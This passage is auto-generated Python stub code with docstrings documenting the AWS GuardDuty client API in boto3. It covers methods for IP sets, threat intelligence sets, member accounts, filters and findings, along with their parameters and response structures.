GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_ip_set(DetectorId=None, Name=None, Format=None, Location=None, Activate=None, ClientToken=None, Tags=None):
"""
Creates a new IPSet, which is called a trusted IP list in the console user interface. An IPSet is a list of IP addresses that are trusted for secure communication with AWS infrastructure and applications. GuardDuty doesn\'t generate findings for IP addresses that are included in IPSets. Only users from the master account can use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_ip_set(
DetectorId='string',
Name='string',
Format='TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
Location='string',
Activate=True|False,
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create an IPSet for.\n
:type Name: string
:param Name: [REQUIRED]\nThe user-friendly name to identify the IPSet.\nAllowed characters are alphanumerics, spaces, hyphens (-), and underscores (_).\n
:type Format: string
:param Format: [REQUIRED]\nThe format of the file that contains the IPSet.\n
:type Location: string
:param Location: [REQUIRED]\nThe URI of the file that contains the IPSet.\n
:type Activate: boolean
:param Activate: [REQUIRED]\nA Boolean value that indicates whether GuardDuty is to start using the uploaded IPSet.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new IP set resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'IpSetId': 'string'
}
Response Structure
(dict) --
IpSetId (string) --
The ID of the IPSet resource.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'IpSetId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_members(DetectorId=None, AccountDetails=None):
"""
Creates member accounts of the current AWS account by specifying a list of AWS account IDs. The current AWS account can then invite these members to manage GuardDuty in their accounts.
See also: AWS API Documentation
Exceptions
:example: response = client.create_members(
DetectorId='string',
AccountDetails=[
{
'AccountId': 'string',
'Email': 'string'
},
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to associate member accounts with.\n
:type AccountDetails: list
:param AccountDetails: [REQUIRED]\nA list of account ID and email address pairs of the accounts that you want to associate with the master GuardDuty account.\n\n(dict) --Contains information about the account.\n\nAccountId (string) -- [REQUIRED]The member account ID.\n\nEmail (string) -- [REQUIRED]The email address of the member account.\n\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that include the accountIds of the unprocessed accounts and a result string that explains why each was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_publishing_destination(DetectorId=None, DestinationType=None, DestinationProperties=None, ClientToken=None):
"""
Creates a publishing destination to export findings to. The resource to export findings to must exist before you use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_publishing_destination(
DetectorId='string',
DestinationType='S3',
DestinationProperties={
'DestinationArn': 'string',
'KmsKeyArn': 'string'
},
ClientToken='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the GuardDuty detector associated with the publishing destination.\n
:type DestinationType: string
:param DestinationType: [REQUIRED]\nThe type of resource for the publishing destination. Currently only Amazon S3 buckets are supported.\n
:type DestinationProperties: dict
:param DestinationProperties: [REQUIRED]\nThe properties of the publishing destination, including the ARNs for the destination and the KMS key used for encryption.\n\nDestinationArn (string) --The ARN of the resource to publish to.\n\nKmsKeyArn (string) --The ARN of the KMS key to use for encryption.\n\n\n
:type ClientToken: string
:param ClientToken: The idempotency token for the request.\nThis field is autopopulated if not provided.\n
:rtype: dict
ReturnsResponse Syntax
{
'DestinationId': 'string'
}
Response Structure
(dict) --
DestinationId (string) --
The ID of the publishing destination that is created.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DestinationId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def create_sample_findings(DetectorId=None, FindingTypes=None):
"""
Generates example findings of types specified by the list of finding types. If \'NULL\' is specified for findingTypes , the API generates example findings of all supported finding types.
See also: AWS API Documentation
Exceptions
:example: response = client.create_sample_findings(
DetectorId='string',
FindingTypes=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to create sample findings for.\n
:type FindingTypes: list
:param FindingTypes: The types of sample findings to generate.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def create_threat_intel_set(DetectorId=None, Name=None, Format=None, Location=None, Activate=None, ClientToken=None, Tags=None):
"""
Creates a new ThreatIntelSet. ThreatIntelSets consist of known malicious IP addresses. GuardDuty generates findings based on ThreatIntelSets. Only users of the master account can use this operation.
See also: AWS API Documentation
Exceptions
:example: response = client.create_threat_intel_set(
DetectorId='string',
Name='string',
Format='TXT'|'STIX'|'OTX_CSV'|'ALIEN_VAULT'|'PROOF_POINT'|'FIRE_EYE',
Location='string',
Activate=True|False,
ClientToken='string',
Tags={
'string': 'string'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account that you want to create a threatIntelSet for.\n
:type Name: string
:param Name: [REQUIRED]\nA user-friendly ThreatIntelSet name displayed in all findings that are generated by activity that involves IP addresses included in this ThreatIntelSet.\n
:type Format: string
:param Format: [REQUIRED]\nThe format of the file that contains the ThreatIntelSet.\n
:type Location: string
:param Location: [REQUIRED]\nThe URI of the file that contains the ThreatIntelSet.\n
:type Activate: boolean
:param Activate: [REQUIRED]\nA Boolean value that indicates whether GuardDuty is to start using the uploaded ThreatIntelSet.\n
:type ClientToken: string
:param ClientToken: The idempotency token for the create request.\nThis field is autopopulated if not provided.\n
:type Tags: dict
:param Tags: The tags to be added to a new threat list resource.\n\n(string) --\n(string) --\n\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'ThreatIntelSetId': 'string'
}
Response Structure
(dict) --
ThreatIntelSetId (string) --
The ID of the ThreatIntelSet resource.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'ThreatIntelSetId': 'string'
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def decline_invitations(AccountIds=None):
"""
Declines invitations sent to the current member account by AWS accounts specified by their account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.decline_invitations(
AccountIds=[
'string',
]
)
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the AWS accounts that sent invitations to the current member account that you want to decline invitations from.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --Contains information about the accounts that weren\'t processed.
AccountId (string) --The AWS account ID.
Result (string) --A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_detector(DetectorId=None):
"""
Deletes an Amazon GuardDuty detector that is specified by the detector ID.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_detector(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that you want to delete.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_filter(DetectorId=None, FilterName=None):
"""
Deletes the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_filter(
DetectorId='string',
FilterName='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter that you want to delete.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_invitations(AccountIds=None):
"""
Deletes invitations sent to the current member account by AWS accounts specified by their account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_invitations(
AccountIds=[
'string',
]
)
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the AWS accounts that sent invitations to the current member account that you want to delete invitations from.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --Contains information about the accounts that weren\'t processed.
AccountId (string) --The AWS account ID.
Result (string) --A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_ip_set(DetectorId=None, IpSetId=None):
"""
Deletes the IPSet specified by the ipSetId . IPSets are called trusted IP lists in the console user interface.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_ip_set(
DetectorId='string',
IpSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the IPSet.\n
:type IpSetId: string
:param IpSetId: [REQUIRED]\nThe unique ID of the IPSet to delete.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_members(DetectorId=None, AccountIds=None):
"""
Deletes GuardDuty member accounts (to the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to delete.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to delete.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
The accounts that could not be processed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def delete_publishing_destination(DetectorId=None, DestinationId=None):
"""
Deletes the publishing definition with the specified destinationId .
See also: AWS API Documentation
Exceptions
:example: response = client.delete_publishing_destination(
DetectorId='string',
DestinationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the publishing destination to delete.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to delete.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def delete_threat_intel_set(DetectorId=None, ThreatIntelSetId=None):
"""
Deletes the ThreatIntelSet specified by the ThreatIntelSet ID.
See also: AWS API Documentation
Exceptions
:example: response = client.delete_threat_intel_set(
DetectorId='string',
ThreatIntelSetId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the threatIntelSet is associated with.\n
:type ThreatIntelSetId: string
:param ThreatIntelSetId: [REQUIRED]\nThe unique ID of the threatIntelSet that you want to delete.\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
(dict) --
"""
pass
def describe_organization_configuration(DetectorId=None):
"""
Returns information about the account selected as the delegated administrator for GuardDuty.
See also: AWS API Documentation
Exceptions
:example: response = client.describe_organization_configuration(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector to retrieve information about the delegated administrator from.\n
:rtype: dict
ReturnsResponse Syntax{
'AutoEnable': True|False,
'MemberAccountLimitReached': True|False
}
Response Structure
(dict) --
AutoEnable (boolean) --Indicates whether GuardDuty is automatically enabled for accounts added to the organization.
MemberAccountLimitReached (boolean) --Indicates whether the maximum number of allowed member accounts are already associated with the delegated administrator master account.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'AutoEnable': True|False,
'MemberAccountLimitReached': True|False
}
"""
pass
def describe_publishing_destination(DetectorId=None, DestinationId=None):
"""
Returns information about the publishing destination specified by the provided destinationId .
See also: AWS API Documentation
Exceptions
:example: response = client.describe_publishing_destination(
DetectorId='string',
DestinationId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector associated with the publishing destination to retrieve.\n
:type DestinationId: string
:param DestinationId: [REQUIRED]\nThe ID of the publishing destination to retrieve.\n
:rtype: dict
ReturnsResponse Syntax
{
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED',
'PublishingFailureStartTimestamp': 123,
'DestinationProperties': {
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
}
Response Structure
(dict) --
DestinationId (string) --
The ID of the publishing destination.
DestinationType (string) --
The type of publishing destination. Currently, only Amazon S3 buckets are supported.
Status (string) --
The status of the publishing destination.
PublishingFailureStartTimestamp (integer) --
The time, in epoch millisecond format, at which GuardDuty was first unable to publish findings to the destination.
DestinationProperties (dict) --
A DestinationProperties object that includes the DestinationArn and KmsKeyArn of the publishing destination.
DestinationArn (string) --
The ARN of the resource to publish to.
KmsKeyArn (string) --
The ARN of the KMS key to use for encryption.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'DestinationId': 'string',
'DestinationType': 'S3',
'Status': 'PENDING_VERIFICATION'|'PUBLISHING'|'UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY'|'STOPPED',
'PublishingFailureStartTimestamp': 123,
'DestinationProperties': {
'DestinationArn': 'string',
'KmsKeyArn': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def disable_organization_admin_account(AdminAccountId=None):
"""
Disables an AWS account within the Organization as the GuardDuty delegated administrator.
See also: AWS API Documentation
Exceptions
:example: response = client.disable_organization_admin_account(
AdminAccountId='string'
)
:type AdminAccountId: string
:param AdminAccountId: [REQUIRED]\nThe AWS Account ID for the organizations account to be disabled as a GuardDuty delegated administrator.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def disassociate_from_master_account(DetectorId=None):
"""
Disassociates the current GuardDuty member account from its master account.
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_from_master_account(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty member account.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def disassociate_members(DetectorId=None, AccountIds=None):
"""
Disassociates GuardDuty member accounts (to the current GuardDuty master account) specified by the account IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.disassociate_members(
DetectorId='string',
AccountIds=[
'string',
]
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector of the GuardDuty account whose members you want to disassociate from the master account.\n
:type AccountIds: list
:param AccountIds: [REQUIRED]\nA list of account IDs of the GuardDuty member accounts that you want to disassociate from the master account.\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
Response Structure
(dict) --
UnprocessedAccounts (list) --
A list of objects that contain the unprocessed account and a result string that explains why it was unprocessed.
(dict) --
Contains information about the accounts that weren\'t processed.
AccountId (string) --
The AWS account ID.
Result (string) --
A reason why the account hasn\'t been processed.
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'UnprocessedAccounts': [
{
'AccountId': 'string',
'Result': 'string'
},
]
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def enable_organization_admin_account(AdminAccountId=None):
"""
Enables an AWS account within the organization as the GuardDuty delegated administrator.
See also: AWS API Documentation
Exceptions
:example: response = client.enable_organization_admin_account(
AdminAccountId='string'
)
:type AdminAccountId: string
:param AdminAccountId: [REQUIRED]\nThe AWS Account ID for the organization account to be enabled as a GuardDuty delegated administrator.\n
:rtype: dict
ReturnsResponse Syntax{}
Response Structure
(dict) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to\nClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid\nfor. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By\ndefault, the http method is whatever is used in the method\'s model.
"""
pass
def get_detector(DetectorId=None):
"""
Retrieves an Amazon GuardDuty detector specified by the detectorId.
See also: AWS API Documentation
Exceptions
:example: response = client.get_detector(
DetectorId='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that you want to get.\n
:rtype: dict
ReturnsResponse Syntax{
'CreatedAt': 'string',
'FindingPublishingFrequency': 'FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
'ServiceRole': 'string',
'Status': 'ENABLED'|'DISABLED',
'UpdatedAt': 'string',
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
CreatedAt (string) --The timestamp of when the detector was created.
FindingPublishingFrequency (string) --The publishing frequency of the finding.
ServiceRole (string) --The GuardDuty service role.
Status (string) --The detector status.
UpdatedAt (string) --The last-updated timestamp for the detector.
Tags (dict) --The tags of the detector resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'CreatedAt': 'string',
'FindingPublishingFrequency': 'FIFTEEN_MINUTES'|'ONE_HOUR'|'SIX_HOURS',
'ServiceRole': 'string',
'Status': 'ENABLED'|'DISABLED',
'UpdatedAt': 'string',
'Tags': {
'string': 'string'
}
}
:returns:
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
"""
pass
def get_filter(DetectorId=None, FilterName=None):
"""
Returns the details of the filter specified by the filter name.
See also: AWS API Documentation
Exceptions
:example: response = client.get_filter(
DetectorId='string',
FilterName='string'
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe unique ID of the detector that the filter is associated with.\n
:type FilterName: string
:param FilterName: [REQUIRED]\nThe name of the filter you want to get.\n
:rtype: dict
ReturnsResponse Syntax
{
'Name': 'string',
'Description': 'string',
'Action': 'NOOP'|'ARCHIVE',
'Rank': 123,
'FindingCriteria': {
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
'Tags': {
'string': 'string'
}
}
Response Structure
(dict) --
Name (string) --
The name of the filter.
Description (string) --
The description of the filter.
Action (string) --
Specifies the action that is to be applied to the findings that match the filter.
Rank (integer) --
Specifies the position of the filter in the list of current filters. Also specifies the order in which this filter is applied to the findings.
FindingCriteria (dict) --
Represents the criteria to be used in the filter for querying findings.
Criterion (dict) --
Represents a map of finding properties that match specified conditions and values when querying findings.
(string) --
(dict) --
Contains information about the condition.
Eq (list) --
Represents the equal condition to be applied to a single field when querying for findings.
(string) --
Neq (list) --
Represents the not equal condition to be applied to a single field when querying for findings.
(string) --
Gt (integer) --
Represents a greater than condition to be applied to a single field when querying for findings.
Gte (integer) --
Represents a greater than or equal condition to be applied to a single field when querying for findings.
Lt (integer) --
Represents a less than condition to be applied to a single field when querying for findings.
Lte (integer) --
Represents a less than or equal condition to be applied to a single field when querying for findings.
Equals (list) --
Represents an equal condition to be applied to a single field when querying for findings.
(string) --
NotEquals (list) --
Represents a not equal condition to be applied to a single field when querying for findings.
(string) --
GreaterThan (integer) --
Represents a greater than condition to be applied to a single field when querying for findings.
GreaterThanOrEqual (integer) --
Represents a greater than or equal condition to be applied to a single field when querying for findings.
LessThan (integer) --
Represents a less than condition to be applied to a single field when querying for findings.
LessThanOrEqual (integer) --
Represents a less than or equal condition to be applied to a single field when querying for findings.
Tags (dict) --
The tags of the filter resource.
(string) --
(string) --
Exceptions
GuardDuty.Client.exceptions.BadRequestException
GuardDuty.Client.exceptions.InternalServerErrorException
:return: {
'Name': 'string',
'Description': 'string',
'Action': 'NOOP'|'ARCHIVE',
'Rank': 123,
'FindingCriteria': {
'Criterion': {
'string': {
'Eq': [
'string',
],
'Neq': [
'string',
],
'Gt': 123,
'Gte': 123,
'Lt': 123,
'Lte': 123,
'Equals': [
'string',
],
'NotEquals': [
'string',
],
'GreaterThan': 123,
'GreaterThanOrEqual': 123,
'LessThan': 123,
'LessThanOrEqual': 123
}
}
},
'Tags': {
'string': 'string'
}
}
:returns:
(string) --
"""
pass
def get_findings(DetectorId=None, FindingIds=None, SortCriteria=None):
"""
Describes Amazon GuardDuty findings specified by finding IDs.
See also: AWS API Documentation
Exceptions
:example: response = client.get_findings(
DetectorId='string',
FindingIds=[
'string',
],
SortCriteria={
'AttributeName': 'string',
'OrderBy': 'ASC'|'DESC'
}
)
:type DetectorId: string
:param DetectorId: [REQUIRED]\nThe ID of the detector that specifies the GuardDuty service whose findings you want to retrieve.\n
:type FindingIds: list
:param FindingIds: [REQUIRED]\nThe IDs of the findings that you want to retrieve.\n\n(string) --\n\n
:type SortCriteria: dict
:param SortCriteria: Represents the criteria used for sorting findings.\n\nAttributeName (string) --Represents the finding attribute (for example, accountId) to sort findings by.\n\nOrderBy (string) --The order by which the sorted findings are to be displayed.\n\n\n
:rtype: dict
ReturnsResponse Syntax
{
'Findings': [
{
'AccountId': 'string',
'Arn': 'string',
'Confidence': 123.0,
'CreatedAt': 'string',
'Description': 'string',
'Id': 'string',
'Partition': 'string',
'Region': 'string',
'Resource': {
'AccessKeyDetails': {
'AccessKeyId': 'string',
'PrincipalId': 'string',
'UserName': 'string',
'UserType': 'string'
},
'InstanceDetails': {
'AvailabilityZone': 'string',
'IamInstanceProfile': {
'Arn': 'string',
'Id': 'string'
},
'ImageDescription': 'string',
'ImageId': 'string',
'InstanceId': 'string',
'InstanceState': 'string',
'InstanceType': 'string',
'OutpostArn': 'string',
'LaunchTime': 'string',
'NetworkInterfaces': [
{
'Ipv6Addresses': [
'string',
],
'NetworkInterfaceId': 'string',
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string',
'PrivateIpAddresses': [
{
'PrivateDnsName': 'string',
'PrivateIpAddress': 'string'
},
],
'PublicDnsName': 'string',
'PublicIp': 'string',
'SecurityGroups': [
{
'GroupId': 'string',
'GroupName': 'string'
},
],
'SubnetId': 'string',
'VpcId': 'string'
},
],
'Platform': 'string',
'ProductCodes': [
{
'Code': 'string',
'ProductType': 'string'
},
],
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
'ResourceType': 'string'
},
'SchemaVersion': 'string',
'Service': {
'Action': {
'ActionType': 'string',
'AwsApiCallAction': {
'Api': 'string',
'CallerType': 'string',
'DomainDetails': {
'Domain': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'ServiceName': 'string'
},
'DnsRequestAction': {
'Domain': 'string'
},
'NetworkConnectionAction': {
'Blocked': True|False,
'ConnectionDirection': 'string',
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'Protocol': 'string',
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
},
'RemotePortDetails': {
'Port': 123,
'PortName': 'string'
}
},
'PortProbeAction': {
'Blocked': True|False,
'PortProbeDetails': [
{
'LocalPortDetails': {
'Port': 123,
'PortName': 'string'
},
'LocalIpDetails': {
'IpAddressV4': 'string'
},
'RemoteIpDetails': {
'City': {
'CityName': 'string'
},
'Country': {
'CountryCode': 'string',
'CountryName': 'string'
},
'GeoLocation': {
'Lat': 123.0,
'Lon': 123.0
},
'IpAddressV4': 'string',
'Organization': {
'Asn': 'string',
'AsnOrg': 'string',
'Isp': 'string',
'Org': 'string'
}
}
},
]
}
},
'Evidence': {
'ThreatIntelligenceDetails': [
{
'ThreatListName': 'string',
'ThreatNames': [
'string',
]
},
]
},
'Archived': True|False,
'Count': 123,
'DetectorId': 'string',
'EventFirstSeen': 'string',
'EventLastSeen': 'string',
'ResourceRole': 'string',
'ServiceName': 'string',
'UserFeedback': 'string'
},
'Severity': 123.0,
'Title': 'string',
'Type': 'string',
'UpdatedAt': 'string'
},
]
}
Response Structure
(dict) --
Findings (list) --
A list of findings.
(dict) --
Contains information about the finding, which is generated when abnormal or suspicious activity is detected.
AccountId (string) --
The ID of the account in which the finding was generated.
Arn (string) --
The ARN of the finding.
Confidence (float) --
The confidence score for the finding.
CreatedAt (string) --
The time and date when the finding was created.
Description (string) --
The description of the finding.
Id (string) --
The ID of the finding.
Partition (string) --
The partition associated with the finding.
Region (string) --
The Region where the finding was generated.
Resource (dict) --
Contains information about the AWS resource associated with the activity that prompted GuardDuty to generate a finding.
AccessKeyDetails (dict) --
The IAM access key details (IAM user information) of a user that engaged in the activity that prompted GuardDuty to generate a finding.
AccessKeyId (string) --
The access key ID of the user.
PrincipalId (string) --
The principal ID of the user.
UserName (string) --
The name of the user.
UserType (string) --
The type of the user.
InstanceDetails (dict) --
The information about the EC2 instance associated with the activity that prompted GuardDuty to generate a finding.
AvailabilityZone (string) --
The Availability Zone of the EC2 instance.
IamInstanceProfile (dict) --
The profile information of the EC2 instance.
Arn (string) --
The profile ARN of the EC2 instance.
Id (string) --
The profile ID of the EC2 instance.
ImageDescription (string) --
The image description of the EC2 instance.
ImageId (string) --
The image ID of the EC2 instance.
InstanceId (string) --
The ID of the EC2 instance.
InstanceState (string) --
The state of the EC2 instance.
InstanceType (string) --
The type of the EC2 instance.
OutpostArn (string) --
